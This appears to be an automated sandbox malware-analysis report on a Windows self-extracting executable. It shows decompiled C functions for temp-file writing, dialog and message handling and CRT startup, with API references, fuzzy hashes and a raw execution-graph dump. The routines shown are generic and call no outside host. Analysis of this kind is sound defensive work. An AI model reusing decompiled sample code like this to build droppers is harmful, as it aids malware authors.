                                                                        • Instruction ID: b83a07e1c1fe719fa03c56f62997d400f98aaf6f7bcb3da6d3dd2bdac7a899dd
                                                                        • Opcode Fuzzy Hash: c2add5da002b23f833a8bf87187821a002d2e1348694aed626d04ec63efc5573
                                                                        • Instruction Fuzzy Hash: C1113AB1D0520CDBCB14EFB9DA48A9EB7F6EF18320F614855E801E7214EA349A05AF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E00F363C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				long _v272;
                                                                        				void* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t15;
                                                                        				long _t28;
                                                                        				struct _OVERLAPPED* _t37;
                                                                        				void* _t39;
                                                                        				signed int _t40;
                                                                        
                                                                        				_t15 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t15 ^ _t40;
                                                                        				_v272 = _v272 & 0x00000000;
                                                                        				_push(__ecx);
                                                                        				_v276 = _a16;
                                                                        				_t37 = 1;
                                                                        				E00F31781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        				E00F3658A( &_v268, 0x104, _a12);
                                                                        				_t28 = 0;
                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                        				if(_t39 != 0xffffffff) {
                                                                        					_t28 = _a4;
                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                        						 *0xf39124 = 0x80070052;
                                                                        						_t37 = 0;
                                                                        					}
                                                                        					CloseHandle(_t39);
                                                                        				} else {
                                                                        					 *0xf39124 = 0x80070052;
                                                                        					_t37 = 0;
                                                                        				}
                                                                        				return E00F36CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                        			}
















                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F3642D
                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F3645B
                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F3647A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F363EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleWrite
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 1065093856-3217841213
                                                                        • Opcode ID: 80463fcbe71e98566b03b57057f8ab7770044f23a2786a930d73ee9f83f386c0
                                                                        • Instruction ID: e89ed1848dc151bfa92c3dcccfb2c403ad848615199fb6954ec776aae804b200
                                                                        • Opcode Fuzzy Hash: 80463fcbe71e98566b03b57057f8ab7770044f23a2786a930d73ee9f83f386c0
                                                                        • Instruction Fuzzy Hash: D221C0B1A0021CABDB10DF25DC85FEA7769EB44334F0041A9F585A3280DAB49D85AFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F347E0(intOrPtr* __ecx) {
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t9;
                                                                        				void* _t11;
                                                                        				void* _t19;
                                                                        				intOrPtr* _t22;
                                                                        				void _t24;
                                                                        				struct HWND__* _t25;
                                                                        				struct HWND__* _t26;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t28;
                                                                        				intOrPtr* _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t33 = __ecx;
                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                        				if(_t34 != 0) {
                                                                        					_t22 = _t33;
                                                                        					_t27 = _t22 + 1;
                                                                        					do {
                                                                        						_t6 =  *_t22;
                                                                        						_t22 = _t22 + 1;
                                                                        					} while (_t6 != 0);
                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                        					 *_t34 = _t24;
                                                                        					if(_t24 != 0) {
                                                                        						_t28 = _t33;
                                                                        						_t19 = _t28 + 1;
                                                                        						do {
                                                                        							_t9 =  *_t28;
                                                                        							_t28 = _t28 + 1;
                                                                        						} while (_t9 != 0);
                                                                        						E00F31680(_t24, _t28 - _t19 + 1, _t33);
                                                                        						_t11 =  *0xf391e0; // 0x9c7c60
                                                                        						 *(_t34 + 4) = _t11;
                                                                        						 *0xf391e0 = _t34;
                                                                        						return 1;
                                                                        					}
                                                                        					_t25 =  *0xf38584; // 0x0
                                                                        					E00F344B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                        					LocalFree(_t34);
                                                                        					L2:
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 =  *0xf38584; // 0x0
                                                                        				E00F344B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                        				goto L2;
                                                                        			}
















                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00F34E6F), ref: 00F347EA
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00F34823
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00F34847
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F34851
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 359063898-3217841213
                                                                        • Opcode ID: caaadd5bd8d88c0bac67f38abb3bdddb2096d279500ce1382d1867ac62133933
                                                                        • Instruction ID: c71de26d5a91f559f99577efe8e8b92475220b735cc6a7664ba3ca6e712d138c
                                                                        • Opcode Fuzzy Hash: caaadd5bd8d88c0bac67f38abb3bdddb2096d279500ce1382d1867ac62133933
                                                                        • Instruction Fuzzy Hash: 701125B5A047416FD7149F249C18F763B5BEB85370F048519FE829B381DA79FC06AA60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F33680(void* __ecx) {
                                                                        				void* _v8;
                                                                        				struct tagMSG _v36;
                                                                        				int _t8;
                                                                        				struct HWND__* _t16;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t16 = 0;
                                                                        				while(1) {
                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                        					if(_t8 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                        						continue;
                                                                        					} else {
                                                                        						do {
                                                                        							if(_v36.message != 0x12) {
                                                                        								DispatchMessageA( &_v36);
                                                                        							} else {
                                                                        								_t16 = 1;
                                                                        							}
                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                        						} while (_t8 != 0);
                                                                        						if(_t16 == 0) {
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t8;
                                                                        			}








                                                                        APIs
                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00F3369F
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F336B2
                                                                        • DispatchMessageA.USER32(?), ref: 00F336CB
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F336DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                        • String ID:
                                                                        • API String ID: 2776232527-0
                                                                        • Opcode ID: 10776b1ed410cf5c27dcf75cc08e41ae2dc3ebf2025a3cf059468a62d91ecbca
                                                                        • Instruction ID: 2b05cc8a934468676b41946179a847013ee7fc241bf6d9ce6a14678ee254fd61
                                                                        • Opcode Fuzzy Hash: 10776b1ed410cf5c27dcf75cc08e41ae2dc3ebf2025a3cf059468a62d91ecbca
                                                                        • Instruction Fuzzy Hash: 4D01A772D00218BBDB309BA75C4DEEB767CEBC5B30F100229FD05E2284D660C640EAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00F36517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                        				struct HRSRC__* _t6;
                                                                        				void* _t21;
                                                                        				struct HINSTANCE__* _t23;
                                                                        				int _t24;
                                                                        
                                                                        				_t23 =  *0xf39a3c; // 0xf30000
                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                        				if(_t6 == 0) {
                                                                        					L6:
                                                                        					E00F344B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                        					_t24 = _a16;
                                                                        				} else {
                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                        					if(_t21 == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						if(_a12 != 0) {
                                                                        							_push(_a12);
                                                                        						} else {
                                                                        							_push(0);
                                                                        						}
                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                        						FreeResource(_t21);
                                                                        						if(_t24 == 0xffffffff) {
                                                                        							goto L6;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t24;
                                                                        			}








                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00F30000,000007D6,00000005), ref: 00F3652A
                                                                        • LoadResource.KERNEL32(00F30000,00000000,?,?,00F32EE8,00000000,00F319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F36538
                                                                        • DialogBoxIndirectParamA.USER32(00F30000,00000000,00000547,00F319E0,00000000), ref: 00F36557
                                                                        • FreeResource.KERNEL32(00000000,?,?,00F32EE8,00000000,00F319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F36560
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                        • String ID:
                                                                        • API String ID: 1214682469-0
                                                                        • Opcode ID: 70cbcb3dce53e3a48ce015947070059e4e1d1f4ac0f98c1c4157170815ba0d2d
                                                                        • Instruction ID: 77055c574a9a12f880893593bf2fdf9799ea3eab9ad7accc5394539a52833eab
                                                                        • Opcode Fuzzy Hash: 70cbcb3dce53e3a48ce015947070059e4e1d1f4ac0f98c1c4157170815ba0d2d
                                                                        • Instruction Fuzzy Hash: BD014972500609BBCB106F6A9C48DBB7A6DEB85370F044139FE50D3150D771DC10FAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E00F365E8(char* __ecx) {
                                                                        				char _t3;
                                                                        				char _t10;
                                                                        				char* _t12;
                                                                        				char* _t14;
                                                                        				char* _t15;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t12 = __ecx;
                                                                        				_t15 = __ecx;
                                                                        				_t14 =  &(__ecx[1]);
                                                                        				_t10 = 0;
                                                                        				do {
                                                                        					_t3 =  *_t12;
                                                                        					_t12 =  &(_t12[1]);
                                                                        				} while (_t3 != 0);
                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                        				while(1) {
                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                        					if(_t16 <= _t15) {
                                                                        						break;
                                                                        					}
                                                                        					if( *_t16 == 0x5c) {
                                                                        						L7:
                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                        							_t16 = CharNextA(_t16);
                                                                        						}
                                                                        						 *_t16 = _t10;
                                                                        						_t10 = 1;
                                                                        					} else {
                                                                        						_push(_t16);
                                                                        						continue;
                                                                        					}
                                                                        					L11:
                                                                        					return _t10;
                                                                        				}
                                                                        				if( *_t16 == 0x5c) {
                                                                        					goto L7;
                                                                        				}
                                                                        				goto L11;
                                                                        			}










                                                                        APIs
                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00F32B33), ref: 00F36602
                                                                        • CharPrevA.USER32(?,00000000), ref: 00F36612
                                                                        • CharPrevA.USER32(?,00000000), ref: 00F36629
                                                                        • CharNextA.USER32(00000000), ref: 00F36635
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Prev$Next
                                                                        • String ID:
                                                                        • API String ID: 3260447230-0
                                                                        • Opcode ID: 77a3c78685b46c9e466b52ff5268a1340985e26a9878aa9ec0b58eb506f45187
                                                                        • Instruction ID: a08cab2ceea7815c4743fe4c2e1902cb08dd6c07819ac858f136f06225e0f73a
                                                                        • Opcode Fuzzy Hash: 77a3c78685b46c9e466b52ff5268a1340985e26a9878aa9ec0b58eb506f45187
                                                                        • Instruction Fuzzy Hash: 85F028328041507EE7322B298C88DBBBF9DCF973B5F2941AFE4D2C6111D6150D06BA71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F369B0() {
                                                                        				intOrPtr* _t4;
                                                                        				intOrPtr* _t5;
                                                                        				void* _t6;
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t12;
                                                                        
                                                                        				 *0xf381f8 = E00F36C70();
                                                                        				__set_app_type(E00F36FBE(2));
                                                                        				 *0xf388a4 =  *0xf388a4 | 0xffffffff;
                                                                        				 *0xf388a8 =  *0xf388a8 | 0xffffffff;
                                                                        				_t4 = __p__fmode();
                                                                        				_t11 =  *0xf38528; // 0x0
                                                                        				 *_t4 = _t11;
                                                                        				_t5 = __p__commode();
                                                                        				_t12 =  *0xf3851c; // 0x0
                                                                        				 *_t5 = _t12;
                                                                        				_t6 = E00F37000();
                                                                        				if( *0xf38000 == 0) {
                                                                        					__setusermatherr(E00F37000);
                                                                        				}
                                                                        				E00F371EF(_t6);
                                                                        				return 0;
                                                                        			}









                                                                        APIs
                                                                          • Part of subcall function 00F36FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00F36FC5
                                                                        • __set_app_type.MSVCRT ref: 00F369C2
                                                                        • __p__fmode.MSVCRT ref: 00F369D8
                                                                        • __p__commode.MSVCRT ref: 00F369E6
                                                                        • __setusermatherr.MSVCRT ref: 00F36A07
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                        • String ID:
                                                                        • API String ID: 1632413811-0
                                                                        • Opcode ID: e3714371b7ab2a2906a2a4c7a73153b595fd23428e10943dde560f4a80f67eb4
                                                                        • Instruction ID: b248c2d8637bb875653f254506dde5d28d245a3a650b338f51315d8fdf014d0d
                                                                        • Opcode Fuzzy Hash: e3714371b7ab2a2906a2a4c7a73153b595fd23428e10943dde560f4a80f67eb4
                                                                        • Instruction Fuzzy Hash: D8F0F8B05093099FC768AB30AE0A6093B62FB04371F104609F4A1862F1CF7ED542BA11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:5.6%
                                                                        Dynamic/Decrypted Code Coverage:7.8%
                                                                        Signature Coverage:4.6%
                                                                        Total number of Nodes:1249
                                                                        Total number of Limit Nodes:48
14621 417176 __crtCompareStringA_stat 14626 4171ae MultiByteToWideChar 14621->14626 14621->14640 14635 417333 14622->14635 14625 417a69 ___convertcp 70 API calls 14623->14625 14624->14621 14628 40b84d _malloc 63 API calls 14624->14628 14629 41730e 14625->14629 14627 4171c7 LCMapStringW 14626->14627 14652 4172a9 14626->14652 14630 4171e8 14627->14630 14627->14652 14628->14621 14632 417318 LCMapStringA 14629->14632 14629->14640 14636 4171f1 14630->14636 14637 41721a 14630->14637 14631 40b6b5 ___endstdio 63 API calls 14634 4173fe 14631->14634 14632->14635 14642 41733a 14632->14642 14633 4147ae __freea 63 API calls 14633->14640 14638 40b6b5 ___endstdio 63 API calls 14634->14638 14634->14640 14635->14631 14635->14634 14639 417203 LCMapStringW 14636->14639 14636->14652 14647 40b84d _malloc 63 API calls 14637->14647 14650 417235 __crtCompareStringA_stat 14637->14650 14638->14640 14639->14652 14640->14618 14641 417269 LCMapStringW 14644 417281 WideCharToMultiByte 14641->14644 14645 4172a3 14641->14645 14643 41734b _memset __crtCompareStringA_stat 14642->14643 14646 40b84d _malloc 63 API calls 14642->14646 14643->14635 14649 417389 LCMapStringA 14643->14649 14644->14645 14648 4147ae __freea 63 API calls 14645->14648 14646->14643 14647->14650 14648->14652 14653 4173a5 14649->14653 14654 4173a9 14649->14654 14650->14641 14650->14652 14652->14633 14656 4147ae __freea 63 API calls 14653->14656 14655 417a69 ___convertcp 70 API calls 14654->14655 14655->14653 14656->14635 14657->14523 14659 41358c 14658->14659 14660 41046e __encode_pointer 6 API calls 14659->14660 14661 4135a4 14659->14661 14660->14659 14661->13796 14665 40d281 14662->14665 14664 40d2ca 14664->13798 14666 40d28d _doexit 14665->14666 14673 40e806 14666->14673 14672 40d2ae _doexit 14672->14664 14674 40d6e0 __lock 63 API calls 14673->14674 14675 40d292 14674->14675 14676 40d196 14675->14676 14677 4104e9 __decode_pointer 6 API calls 14676->14677 14678 40d1aa 14677->14678 14679 4104e9 __decode_pointer 6 API calls 
14678->14679 14680 40d1ba 14679->14680 14689 40d23d 14680->14689 14696 40e56a 14680->14696 14682 41046e __encode_pointer 6 API calls 14684 40d232 14682->14684 14683 40d1d8 14685 40d1fc 14683->14685 14692 40d224 14683->14692 14709 411d06 14683->14709 14687 41046e __encode_pointer 6 API calls 14684->14687 14688 411d06 __realloc_crt 73 API calls 14685->14688 14685->14689 14690 40d212 14685->14690 14687->14689 14688->14690 14693 40d2b7 14689->14693 14690->14689 14691 41046e __encode_pointer 6 API calls 14690->14691 14691->14692 14692->14682 14758 40e80f 14693->14758 14697 40e576 _doexit 14696->14697 14698 40e5a3 14697->14698 14699 40e586 14697->14699 14700 40e5e4 HeapSize 14698->14700 14702 40d6e0 __lock 63 API calls 14698->14702 14701 40bfc1 __flsbuf 63 API calls 14699->14701 14705 40e59b _doexit 14700->14705 14703 40e58b 14701->14703 14706 40e5b3 ___sbh_find_block 14702->14706 14704 40e744 __msize 6 API calls 14703->14704 14704->14705 14705->14683 14714 40e604 14706->14714 14713 411d0f 14709->14713 14711 411d4e 14711->14685 14712 411d2f Sleep 14712->14713 14713->14711 14713->14712 14718 40e34f 14713->14718 14717 40d606 LeaveCriticalSection 14714->14717 14716 40e5df 14716->14700 14716->14705 14717->14716 14719 40e35b _doexit 14718->14719 14720 40e370 14719->14720 14721 40e362 14719->14721 14723 40e383 14720->14723 14724 40e377 14720->14724 14722 40b84d _malloc 63 API calls 14721->14722 14740 40e36a __dosmaperr _doexit 14722->14740 14730 40e4f5 14723->14730 14752 40e390 _memcpy_s ___sbh_resize_block ___sbh_find_block 14723->14752 14725 40b6b5 ___endstdio 63 API calls 14724->14725 14725->14740 14726 40e528 14728 40d2e3 __calloc_impl 6 API calls 14726->14728 14727 40e4fa HeapReAlloc 14727->14730 14727->14740 14731 40e52e 14728->14731 14729 40d6e0 __lock 63 API calls 14729->14752 14730->14726 14730->14727 14732 40e54c 14730->14732 14734 40d2e3 __calloc_impl 6 API calls 14730->14734 14736 40e542 14730->14736 14733 40bfc1 __flsbuf 63 API calls 14731->14733 14735 40bfc1 
__flsbuf 63 API calls 14732->14735 14732->14740 14733->14740 14734->14730 14737 40e555 GetLastError 14735->14737 14739 40bfc1 __flsbuf 63 API calls 14736->14739 14737->14740 14742 40e4c3 14739->14742 14740->14713 14741 40e41b HeapAlloc 14741->14752 14742->14740 14744 40e4c8 GetLastError 14742->14744 14743 40e470 HeapReAlloc 14743->14752 14744->14740 14745 40def2 ___sbh_alloc_block 5 API calls 14745->14752 14746 40e4db 14746->14740 14748 40bfc1 __flsbuf 63 API calls 14746->14748 14747 40d2e3 __calloc_impl 6 API calls 14747->14752 14749 40e4e8 14748->14749 14749->14737 14749->14740 14750 40e4be 14751 40bfc1 __flsbuf 63 API calls 14750->14751 14751->14742 14752->14726 14752->14729 14752->14740 14752->14741 14752->14743 14752->14745 14752->14746 14752->14747 14752->14750 14753 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 14752->14753 14754 40e493 14752->14754 14753->14752 14757 40d606 LeaveCriticalSection 14754->14757 14756 40e49a 14756->14752 14757->14756 14761 40d606 LeaveCriticalSection 14758->14761 14760 40d2bc 14760->14672 14761->14760 14765 40b9aa _doexit _strnlen 14762->14765 14763 40b9b8 14764 40bfc1 __flsbuf 63 API calls 14763->14764 14766 40b9bd 14764->14766 14765->14763 14768 40b9ec 14765->14768 14767 40e744 __msize 6 API calls 14766->14767 14772 40b9cd _doexit 14767->14772 14769 40d6e0 __lock 63 API calls 14768->14769 14770 40b9f3 14769->14770 14819 40b917 14770->14819 14772->13802 14776 4017cc _memcpy_s 14775->14776 14776->13806 14779 40af70 14777->14779 14778 40b84d _malloc 63 API calls 14778->14779 14779->14778 14780 40af8a 14779->14780 14781 40d2e3 __calloc_impl 6 API calls 14779->14781 14782 40af8c std::bad_alloc::bad_alloc 14779->14782 14780->13812 14781->14779 14785 40d2bd __cinit 74 API calls 14782->14785 14787 40afb2 14782->14787 14785->14787 15033 40af49 14787->15033 14788 40afca 14790 401903 lstrlenA 14789->14790 14791 4018fc 14789->14791 15045 4017e0 14790->15045 14791->13834 14794 401940 GetLastError 14796 40194b 
MultiByteToWideChar 14794->14796 14797 40198d 14794->14797 14795 401996 14795->13834 14798 4017e0 73 API calls 14796->14798 14797->14795 15053 401030 GetLastError 14797->15053 14799 401970 MultiByteToWideChar 14798->14799 14799->14797 14802 40af66 75 API calls 14801->14802 14803 40187c 14802->14803 14804 401885 SysAllocString 14803->14804 14805 4018a4 14803->14805 14804->14805 14805->13836 14807 40231a SafeArrayUnaccessData 14806->14807 14807->13843 14809 4019aa InterlockedDecrement 14808->14809 14810 4019df VariantClear 14808->14810 14809->14810 14811 4019b8 14809->14811 14810->13850 14811->14810 14812 4019c2 SysFreeString 14811->14812 14813 4019c9 14811->14813 14812->14813 15062 40aec0 14813->15062 14816 401571 14815->14816 14818 401582 14815->14818 15068 40afe0 14816->15068 14818->13814 14818->14818 14820 40b930 14819->14820 14821 40b92c 14819->14821 14820->14821 14823 40b942 _strlen 14820->14823 14828 40eeab 14820->14828 14825 40ba18 14821->14825 14823->14821 14838 40edfb 14823->14838 15032 40d606 LeaveCriticalSection 14825->15032 14827 40ba1f 14827->14772 14829 40ef2b 14828->14829 14832 40eec6 14828->14832 14829->14823 14830 40eecc WideCharToMultiByte 14830->14829 14830->14832 14831 411cba __calloc_crt 63 API calls 14831->14832 14832->14829 14832->14830 14832->14831 14833 40eeef WideCharToMultiByte 14832->14833 14837 40b6b5 ___endstdio 63 API calls 14832->14837 14841 414d44 14832->14841 14833->14832 14834 40ef37 14833->14834 14835 40b6b5 ___endstdio 63 API calls 14834->14835 14835->14829 14837->14832 14933 40ed0d 14838->14933 14842 414d76 14841->14842 14843 414d59 14841->14843 14845 414dd4 14842->14845 14887 417e7e 14842->14887 14844 40bfc1 __flsbuf 63 API calls 14843->14844 14846 414d5e 14844->14846 14847 40bfc1 __flsbuf 63 API calls 14845->14847 14849 40e744 __msize 6 API calls 14846->14849 14875 414d6e 14847->14875 14849->14875 14851 414db5 14853 414e12 14851->14853 14854 414de7 14851->14854 14855 414dcb 14851->14855 14853->14875 14898 414c98 14853->14898 
14859 411c75 __malloc_crt 63 API calls 14854->14859 14854->14875 14857 40eeab ___wtomb_environ 120 API calls 14855->14857 14860 414dd0 14857->14860 14862 414df7 14859->14862 14860->14845 14860->14853 14861 414e8f 14863 414f7a 14861->14863 14868 414e98 14861->14868 14862->14853 14867 411c75 __malloc_crt 63 API calls 14862->14867 14862->14875 14865 40b6b5 ___endstdio 63 API calls 14863->14865 14864 414e41 14866 40b6b5 ___endstdio 63 API calls 14864->14866 14865->14875 14870 414e4b 14866->14870 14867->14853 14869 411d54 __recalloc_crt 74 API calls 14868->14869 14868->14875 14872 414e51 _strlen 14869->14872 14870->14872 14902 411d54 14870->14902 14874 411cba __calloc_crt 63 API calls 14872->14874 14872->14875 14886 414f5e 14872->14886 14873 40b6b5 ___endstdio 63 API calls 14873->14875 14876 414efb _strlen 14874->14876 14875->14832 14877 40ef42 _strcpy_s 63 API calls 14876->14877 14876->14886 14878 414f14 14877->14878 14879 414f28 SetEnvironmentVariableA 14878->14879 14880 40e61c __invoke_watson 10 API calls 14878->14880 14881 414f49 14879->14881 14882 414f52 14879->14882 14884 414f25 14880->14884 14885 40bfc1 __flsbuf 63 API calls 14881->14885 14883 40b6b5 ___endstdio 63 API calls 14882->14883 14883->14886 14884->14879 14885->14882 14886->14873 14886->14875 14907 417dc2 14887->14907 14889 414d89 14889->14845 14889->14851 14890 414cea 14889->14890 14891 414d3b 14890->14891 14892 414cfb 14890->14892 14891->14851 14893 411cba __calloc_crt 63 API calls 14892->14893 14894 414d12 14893->14894 14895 40e79a __amsg_exit 63 API calls 14894->14895 14897 414d24 14894->14897 14895->14897 14897->14891 14914 417d6d 14897->14914 14899 414ca6 14898->14899 14900 40edfb __fassign 107 API calls 14899->14900 14901 414ccd 14899->14901 14900->14899 14901->14861 14901->14864 14903 411d5d 14902->14903 14905 411da0 14903->14905 14906 411d81 Sleep 14903->14906 14922 40b783 14903->14922 